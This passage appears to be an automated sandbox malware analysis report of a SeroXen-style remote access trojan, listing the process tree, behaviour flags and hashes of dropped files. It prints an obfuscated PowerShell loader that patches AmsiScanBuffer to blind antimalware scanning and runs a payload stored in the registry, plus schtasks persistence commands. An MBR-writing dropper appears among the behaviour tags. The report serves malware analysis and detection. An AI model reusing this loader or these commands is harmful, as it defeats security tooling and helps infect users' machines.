har](100)+'');Write-Output $fjrMwgwDTuH.CreateType();}$eVUESmZakaoOC=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('S'+[Char](121)+''+[Char](115)+''+[Char](116)+''+'e'+'m'+[Char](46)+''+[Char](100)+''+[Char](108)+''+[Char](108)+'')}).GetType(''+[Char](77)+'i'+[Char](99)+''+'r'+'o'+[Char](115)+''+[Char](111)+''+[Char](102)+'t'+'.'+''+'W'+'i'+[Char](110)+''+'3'+''+[Char](50)+'.Un'+'s'+'af'+[Char](101)+''+[Char](78)+''+'a'+''+[Char](116)+''+'i'+'v'+'e'+'M'+'e'+'t'+[Char](104)+''+[Char](111)+''+'d'+'s');$OaTIeDqGAdMevr=$eVUESmZakaoOC.GetMethod(''+[Char](71)+''+'e'+''+[Char](116)+''+'P'+''+[Char](114)+''+[Char](111)+'cA'+'d'+'d'+[Char](114)+''+'e'+''+'s'+'s',[Reflection.BindingFlags]('P'+'u'+''+[Char](98)+''+[Char](108)+''+[Char](105)+'c,'+[Char](83)+''+[Char](116)+'a'+[Char](116)+''+[Char](105)+''+'c'+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$KIVRBVYZAQwUsbydoJO=HetgjIEFfRmc @([String])([IntPtr]);$yFNYAUBjtgKUzwFdbFTmYw=HetgjIEFfRmc @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$hEjAHDOsAYu=$eVUESmZakaoOC.GetMethod(''+[Char](71)+''+[Char](101)+''+[Char](116)+''+[Char](77)+''+[Char](111)+''+[Char](100)+''+[Char](117)+''+[Char](108)+''+[Char](101)+''+'H'+''+'a'+'nd'+[Char](108)+''+[Char](101)+'').Invoke($Null,@([Object]('ker'+[Char](110)+''+[Char](101)+'l'+'3'+''+'2'+''+[Char](46)+''+'d'+'l'+[Char](108)+'')));$CFTtcBnQDAHZMj=$OaTIeDqGAdMevr.Invoke($Null,@([Object]$hEjAHDOsAYu,[Object](''+[Char](76)+'o'+[Char](97)+''+'d'+''+'L'+''+[Char](105)+''+'b'+''+[Char](114)+''+'a'+''+[Char](114)+''+[Char](121)+''+'A'+'')));$EVFQLtkjaCHuVDGAt=$OaTIeDqGAdMevr.Invoke($Null,@([Object]$hEjAHDOsAYu,[Object]('V'+'i'+''+'r'+''+[Char](116)+''+[Char](117)+''+[Char](97)+''+[Char](108)+''+'P'+''+[Char](114)+''+[Char](111)+''+'t'+''+[Char](101)+''+'c'+'t')));$KAXFwar=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($CFTtcBnQDAHZMj,$KIVRBVYZAQwUsbydoJO).Invoke('am'+'s'+'i'+'.'+'dl'+[Char](108)+'');$kafnhpDCNIMMYQscX=$OaTIeDqGAdMevr.Invoke($Null,@([Object]$KAXFwar,[Object](''+'A'+''+[Char](109)+''+'s'+''+'i'+''+'S'+'c'+'a'+''+'n'+''+[Char](66)+''+[Char](117)+'f'+'f'+''+[Char](101)+'r')));$bpCFMgIYRx=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($EVFQLtkjaCHuVDGAt,$yFNYAUBjtgKUzwFdbFTmYw).Invoke($kafnhpDCNIMMYQscX,[uint32]8,4,[ref]$bpCFMgIYRx);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$kafnhpDCNIMMYQscX,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($EVFQLtkjaCHuVDGAt,$yFNYAUBjtgKUzwFdbFTmYw).Invoke($kafnhpDCNIMMYQscX,[uint32]8,0x20,[ref]$bpCFMgIYRx);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+'S'+''+[Char](79)+''+[Char](70)+'T'+[Char](87)+''+[Char](65)+''+[Char](82)+''+[Char](69)+'').GetValue('$'+'7'+''+[Char](55)+''+'s'+'t'+'a'+''+'g'+''+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4288
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵
- Drops file in System32 directory
PID:1152
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵PID:1248
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵PID:1300
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵PID:1312
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp1⤵PID:1392
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵PID:1520
-
C:\Windows\system32\sihost.exesihost.exe2⤵PID:2540
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem1⤵PID:1528
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵PID:1544
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc1⤵PID:1656
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s SENS1⤵PID:1700
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s netprofm1⤵PID:1752
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder1⤵PID:1804
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1880
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache1⤵PID:1996
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:2008
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection1⤵PID:1508
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository1⤵PID:1952
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2068
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:2144
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation1⤵PID:2240
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc1⤵PID:2288
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵PID:2560
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT1⤵PID:2576
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent1⤵PID:2584
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc1⤵
- Drops file in System32 directory
PID:2764
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer1⤵PID:2808
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker1⤵PID:2840
-
C:\Windows\sysmon.exeC:\Windows\sysmon.exe1⤵PID:2848
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks1⤵PID:2880
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService1⤵PID:2888
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵PID:3096
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc1⤵PID:3400
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:3500
-
C:\Users\Admin\AppData\Local\Temp\Uni.exe"C:\Users\Admin\AppData\Local\Temp\Uni.exe"2⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1588 -
C:\Windows\SysWOW64\schtasks.exe"schtasks" /create /tn "SeroXen" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\Uni.exe" /rl HIGHEST /f3⤵
- Creates scheduled task(s)
PID:3924 -
C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:464 -
C:\Windows\SysWOW64\schtasks.exe"schtasks" /create /tn "SeroXen" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f4⤵
- Creates scheduled task(s)
PID:5060 -
C:\Users\Admin\AppData\Local\Temp\nUYVVSgTogoI.exe"C:\Users\Admin\AppData\Local\Temp\nUYVVSgTogoI.exe"4⤵
- Executes dropped EXE
- Writes to the Master Boot Record (MBR)
PID:2384 -
C:\Users\Admin\AppData\Local\Temp\install.exe"C:\Users\Admin\AppData\Local\Temp\install.exe"3⤵
- Executes dropped EXE
PID:4652 -
C:\Windows\SysWOW64\SCHTASKS.exe"SCHTASKS.exe" /create /tn "$77Uni.exe" /tr "'C:\Users\Admin\AppData\Local\Temp\Uni.exe'" /sc onlogon /rl HIGHEST3⤵
- Creates scheduled task(s)
PID:5008
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc1⤵PID:3628
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:3828
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
- Modifies registry class
PID:3992
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:4128
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:4608
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc1⤵PID:4788
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc1⤵PID:2948
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV1⤵PID:1036
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc1⤵
- Modifies data under HKEY_USERS
PID:336
-
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service1⤵
- Modifies data under HKEY_USERS
PID:3860
-
C:\Windows\system32\SppExtComObj.exeC:\Windows\system32\SppExtComObj.exe -Embedding1⤵PID:4860
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager1⤵PID:4032
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:3168
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:1788
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:2596
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding1⤵
- Checks BIOS information in registry
- Checks SCSI registry key(s)
- Enumerates system info in registry
PID:3748
-
C:\Windows\system32\backgroundTaskHost.exe"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:ShellFeedsUI.AppXnj65k2d1a1rnztt2t2nng5ctmk3e76pn.mca1⤵PID:3224
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
162KB
MD5152e3f07bbaf88fb8b097ba05a60df6e
SHA1c4638921bb140e7b6a722d7c4d88afa7ed4e55c8
SHA256a4623b34f8d09f536e6d8e2f06f6edfb3975938eb0d9927e6cd2ff9c553468fc
SHA5122fcc3136e161e89a123f9ff8447afc21d090afdb075f084439b295988214d4b8e918be7eff47ffeec17a4a47ad5a49195b69e2465f239ee03d961a655ed51cd4
-
Filesize
225KB
MD5af2379cc4d607a45ac44d62135fb7015
SHA139b6d40906c7f7f080e6befa93324dddadcbd9fa
SHA25626b4699a7b9eeb16e76305d843d4ab05e94d43f3201436927e13b3ebafa90739
SHA51269899c47d0b15f92980f79517384e83373242e045ca696c6e8f930ff6454219bf609e0d84c2f91d25dfd5ef3c28c9e099c4a3a918206e957be806a1c2e0d3e99
-
Filesize
409KB
MD54c2bb0618a6eda615c8001d5a7ccd6c0
SHA1c88d2c8bfc5906a5cfef78893d1132edcffd71f0
SHA256abcda524c02f9381d8d43f9ec0079d854db821d77f45e88f50606f46871f81d6
SHA5126abe53339656a023e2a0547f1c2249789c33091d67a21f2e689c6411dc5357e34ec3c65634b6f6955a5023d20803f7c746b13f574bcd84b008abb4a97ea61027
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82